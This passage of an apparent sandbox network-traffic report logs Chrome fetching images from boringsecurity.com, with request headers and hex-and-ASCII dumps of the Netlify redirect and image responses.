                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:59 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:59 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          150192.168.2.54988575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC713OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:59 UTC554INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 31 30 38 30 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 6c 61 72 67 65 5f 42 6f 72 69 6e 67 5f 53 65 63 75 72 69 74 79 5f 4d 75 72 5f 41 6c 6c 5f 73
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:59 GMTLocation: /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_s
                                                                          2023-12-10 16:44:59 UTC266INData Raw: 31 30 33 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 31 30 38 30 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 6c 61 72 67 65 5f 42 6f 72 69 6e 67 5f 53 65 63 75 72 69 74 79 5f 4d 75 72 5f 41 6c 6c 5f 73 71 75 61 72 65 5f 64 66 66 38 64 37 62 64 37 33 2e 6a 70 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 6c 61 72 67 65 5f 42 6f 72 69 6e 67 5f 53 65 63 75 72 69 74 79 5f 4d 75 72 5f 41 6c 6c 5f 73 71 75 61 72 65 5f 64 66 66 38 64 37 62 64 37 33 2e 6a 70 67 26 77 3d 31
                                                                          Data Ascii: 103Redirecting to /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1
                                                                          2023-12-10 16:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          151192.168.2.54988875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC631OUTGET /_next/image?url=%2Fimages%2Fbrushed.jpg&w=640&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:59 UTC390INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 36 34 30 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 62 72 75 73 68 65 64 2e 6a 70 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 62 72 75 73 68 65 64 2e 6a 70 67 26 77 3d 36 34 30 26 71 3d 37 35 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:59 GMTLocation: /_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75Server: NetlifyStri
                                                                          2023-12-10 16:44:59 UTC101INData Raw: 35 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 36 34 30 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 62 72 75 73 68 65 64 2e 6a 70 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 62 72 75 73 68 65 64 2e 6a 70 67 26 77 3d 36 34 30 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: 5fRedirecting to /_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75
                                                                          2023-12-10 16:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          152192.168.2.54988675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC693OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC514INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 66 61 6e 74 61 73 79 5f 61 30 35 64 36 66 39 37 61 39 2e 6a 70 65 67
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:45:00 GMTLocation: /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg
                                                                          2023-12-10 16:45:00 UTC225INData Raw: 64 62 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 66 61 6e 74 61 73 79 5f 61 30 35 64 36 66 39 37 61 39 2e 6a 70 65 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 66 61 6e 74 61 73 79 5f 61 30 35 64 36 66 39 37 61 39 2e 6a 70 65 67 26 77 3d 34 38 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: dbRedirecting to /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75
                                                                          2023-12-10 16:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          153192.168.2.54988475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC695OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:59 UTC518INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 69 73 70 65 61 6b 6e 65 72 64 5f 39 66 63 39 35 32 36 37 31 35 2e 70
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:59 GMTLocation: /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.p
                                                                          2023-12-10 16:44:59 UTC229INData Raw: 64 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 69 73 70 65 61 6b 6e 65 72 64 5f 39 66 63 39 35 32 36 37 31 35 2e 70 6e 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 69 73 70 65 61 6b 6e 65 72 64 5f 39 66 63 39 35 32 36 37 31 35 2e 70 6e 67 26 77 3d 34 38 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: dfRedirecting to /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75
                                                                          2023-12-10 16:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          154192.168.2.54988975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC368OUTGET /images/bs_x_murall_160.jpg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:59 UTC395INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 33 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 32 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 32 39 65 30 39 39 33 32 30 37 66 32 36 38 38 39 62 64 65 39 30 62 35 62 35 61 39
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50932Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 20244Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:59 GMTEtag: "29e0993207f26889bde90b5b5a9
                                                                          2023-12-10 16:44:59 UTC791INData Raw: ff d8 ff e1 00 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 01 01 12 00 03 00 00 00 01 00 01 00 00 00 00 00 00 ff ed 18 48 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 07 1c 02 00 00 02 00 00 00 38 42 49 4d 04 25 00 00 00 00 00 10 e8 f1 5c f3 2f c1 18 a1 a2 7b 67 ad c5 64 d5 ba 38 42 49 4d 04 3a 00 00 00 00 00 e5 00 00 00 10 00 00 00 01 00 00 00 00 00 0b 70 72 69 6e 74 4f 75 74 70 75 74 00 00 00 05 00 00 00 00 50 73 74 53 62 6f 6f 6c 01 00 00 00 00 49 6e 74 65 65 6e 75 6d 00 00 00 00 49 6e 74 65 00 00 00 00 43 6c 72 6d 00 00 00 0f 70 72 69 6e 74 53 69 78 74 65 65 6e 42 69 74 62 6f 6f 6c 00 00 00 00 0b 70 72 69 6e 74 65 72 4e 61 6d 65 54 45 58 54 00 00 00 01 00 00 00 00 00 0f 70 72 69 6e 74 50 72 6f 6f 66 53 65 74 75 70 4f
                                                                          Data Ascii: "ExifMM*HPhotoshop 3.08BIM8BIM%\/{gd8BIM:printOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupO
                                                                          2023-12-10 16:44:59 UTC2372INData Raw: 00 00 00 00 10 63 72 6f 70 57 68 65 6e 50 72 69 6e 74 69 6e 67 62 6f 6f 6c 00 00 00 00 0e 63 72 6f 70 52 65 63 74 42 6f 74 74 6f 6d 6c 6f 6e 67 00 00 00 00 00 00 00 0c 63 72 6f 70 52 65 63 74 4c 65 66 74 6c 6f 6e 67 00 00 00 00 00 00 00 0d 63 72 6f 70 52 65 63 74 52 69 67 68 74 6c 6f 6e 67 00 00 00 00 00 00 00 0b 63 72 6f 70 52 65 63 74 54 6f 70 6c 6f 6e 67 00 00 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 00 00 01 00 01 38 42 49 4d 04 26 00 00 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 3f 80 00 00 38 42 49 4d 03 f2 00 00 00 00 00 0a 00 00 ff ff ff ff ff ff 00 00 38 42 49 4d 04 0d 00 00 00 00 00 04 00 00 00 5a 38 42 49 4d 04 19 00 00 00 00 00 04 00 00 00 1e 38 42 49 4d 03 f3 00 00 00 00 00 09 00 00 00 00 00 00 00 00 01 00
                                                                          Data Ascii: cropWhenPrintingboolcropRectBottomlongcropRectLeftlongcropRectRightlongcropRectToplong8BIMHH8BIM&?8BIM8BIMZ8BIM8BIM
                                                                          2023-12-10 16:44:59 UTC538INData Raw: 0a a6 89 6a b5 4b 9b b8 08 e3 42 92 93 d0 dd dd a5 5e aa 20 47 74 0a 83 49 dd de 15 86 38 7d dd 92 52 5d a6 41 ec 88 21 a2 04 ea a0 d7 08 f0 fe 2a 72 23 53 3e 09 29 62 e7 83 cc ca 8b c8 db c2 93 80 03 4e 67 55 07 19 f9 24 a4 2f 1a 7c 7f 05 4e c6 eb 3d 81 95 6e d7 69 a6 be 28 0f 3d d2 53 46 f6 02 09 6e 9e 0a 95 8d 78 24 b8 48 e1 68 df c8 f2 24 fd ea a5 ad 3e 12 7c 12 53 46 c6 b6 0a a9 60 20 f3 c7 7f 15 71 e2 04 11 3e 08 0f e7 5d 12 53 5c 8d 39 f2 51 23 43 a2 21 6f 92 6d a1 24 bf ff d1 e6 1b 08 8d 1a 88 42 00 f0 8b 5c ee e2 51 52 6a c4 19 f0 56 2b 07 c1 01 82 00 f3 56 2b 2e dd 11 f2 49 0d ba 87 1e 2a d5 7b 43 81 fc ef 25 55 86 23 c7 c7 f8 23 30 ba 01 6c 6e 49 4d ea 9c 00 d4 fc 91 da 76 ce 93 d8 2a 95 c3 80 9f 9f c5 1e 7f 04 94 da 63 c9 1c c4 99 27 94 ed 78
                                                                          Data Ascii: jKB^ GtI8}R]A!*r#S>)bNgU$/|N=ni(=SFnx$Hh$>|SF` q>]S\9Q#C!om$B\QRjV+V+.I*{C%U##0lnIMv*c'x
                                                                          2023-12-10 16:44:59 UTC4744INData Raw: 13 17 92 7c 02 09 74 05 1f 50 c1 0e 12 92 92 3c 96 92 79 ec 83 63 e4 38 1f 97 c7 e0 9b 73 9e fd a0 12 e7 e8 07 8a 0f 50 eb 38 bd 25 9b 29 22 ec c7 72 e1 c8 23 f7 09 fe 66 af f8 4f e7 6e 49 49 0e 26 56 d0 eb 9a 29 07 51 ea 90 d2 7f b1 f4 ff 00 e8 a0 59 8e e6 88 6d 8d 71 e7 40 ef e2 d5 ce e4 f5 4e a5 96 f7 3a cb 9c d0 e3 ab 59 ed 1f f9 37 7f 69 ca bc 5b b8 00 f7 ef 3c 00 5c 5c 67 41 00 7b 92 55 3b d6 57 6b 64 91 20 77 6f 64 17 1d 25 57 2d eb 78 20 ba d6 b9 cc af e9 b1 e4 38 b3 c5 af da 77 d4 e5 62 9c 9a 32 d8 48 fd 1d ad 1e e0 ee df 77 d2 67 fc 22 49 43 dc 84 b8 d0 77 52 70 32 74 d4 72 14 66 66 7f 0e c8 29 ff d3 e6 da 34 93 dd 35 d6 8a da 4c 6b f9 be 69 0d 35 26 00 d4 a1 7a f8 8e 77 eb 15 59 63 47 1e 9b c3 74 f9 b5 15 36 fa 3e 45 6c aa d2 fb 58 2d 7d bb b6
                                                                          Data Ascii: |tP<yc8sP8%)"r#fOnII&V)QYmq@N:Y7i[<\\gA{U;Wkd wod%W-x 8wb2Hwg"ICwRp2trff)45Lki5&zwYcGt6>ElX-}
                                                                          2023-12-10 16:44:59 UTC5930INData Raw: 30 39 46 44 43 42 44 45 33 39 34 31 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 41 30 30 38 42 44 41 34 30 41 36 33 42 46 43 37 41 39 41 35 33 34 34 36 35 30 46 33 44 43 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 37 42 46 46 30 32 31 37 31 44 46 39 34 45 39 34 41 33 46 33 38 41 32 39 32 43 42 46 42 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 38 35 33 43 43 34 36 32 44 38 41 38 41 38 44 30 33 39 39 31 33 37 34 30 45 39 39 36 34 31 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 33 31 33 44 39 45 45 42 41 43 41 42 43 45 43 32 35 42 36 41 33 30 33 36 45 32 35 33 42 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 39 37 45 42 45 34 30 32 41 42 41 31 45 42 41 45 44 46 41 38 34 44
                                                                          Data Ascii: 09FDCBDE3941E</rdf:li> <rdf:li>6A008BDA40A63BFC7A9A5344650F3DC3</rdf:li> <rdf:li>A7BFF02171DF94E94A3F38A292CBFB13</rdf:li> <rdf:li>A853CC462D8A8A8D039913740E99641D</rdf:li> <rdf:li>B313D9EEBACABCEC25B6A3036E253B00</rdf:li> <rdf:li>BB97EBE402ABA1EBAEDFA84D
                                                                          2023-12-10 16:44:59 UTC5869INData Raw: c8 bf 51 a1 c8 11 d6 9d 31 21 14 f7 50 6e 74 5e 8b 4f a7 0a f1 d5 43 66 41 a6 67 fa 87 6a 53 3c 1d a8 37 15 6f d4 34 a9 3e 78 8d 1c d0 c6 32 50 35 3e 27 5c 4a bb 68 55 76 8a 67 95 7a e2 a0 02 5c 57 61 d4 11 91 ae 17 21 46 14 39 66 2b 89 08 35 14 21 68 34 61 97 f1 c0 89 be b4 01 e2 61 99 04 52 a0 e3 61 ab b8 20 39 6c 81 df e0 31 1d ac 82 91 a3 36 67 32 a3 b1 a6 54 e8 2b 87 90 33 aa 44 ab f4 81 ea 1d 1b 71 d0 f7 18 81 ce ca 26 c2 c1 81 a3 13 95 3a e5 d7 0a 62 42 e8 c4 05 52 06 dd 72 fb b0 f1 4c d1 d2 11 4a 14 2a c7 6f 40 46 5e 3a 62 47 28 d2 04 90 ee 68 f2 00 8c f2 ae 00 fd ba ca 35 0c 4d 32 39 d0 9a 53 5c 31 96 15 44 62 44 2d 5d fe dd 75 1e 67 11 20 89 98 b9 34 21 6a 6a 05 7e ca f4 c5 c3 98 06 fd 40 70 49 07 a8 1a 68 31 b4 0d cb b8 98 d9 a8 49 46 1a 1a 76
                                                                          Data Ascii: Q1!Pnt^OCfAgjS<7o4>x2P5>'\JhUvgz\Wa!F9f+5!h4aaRa 9l16g2T+3Dq&:bBRrLJ*o@F^:bG(h5M29S\1DbD-]ug 4!jj~@pIh1IFv


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          155192.168.2.54988775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC783OUTGET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
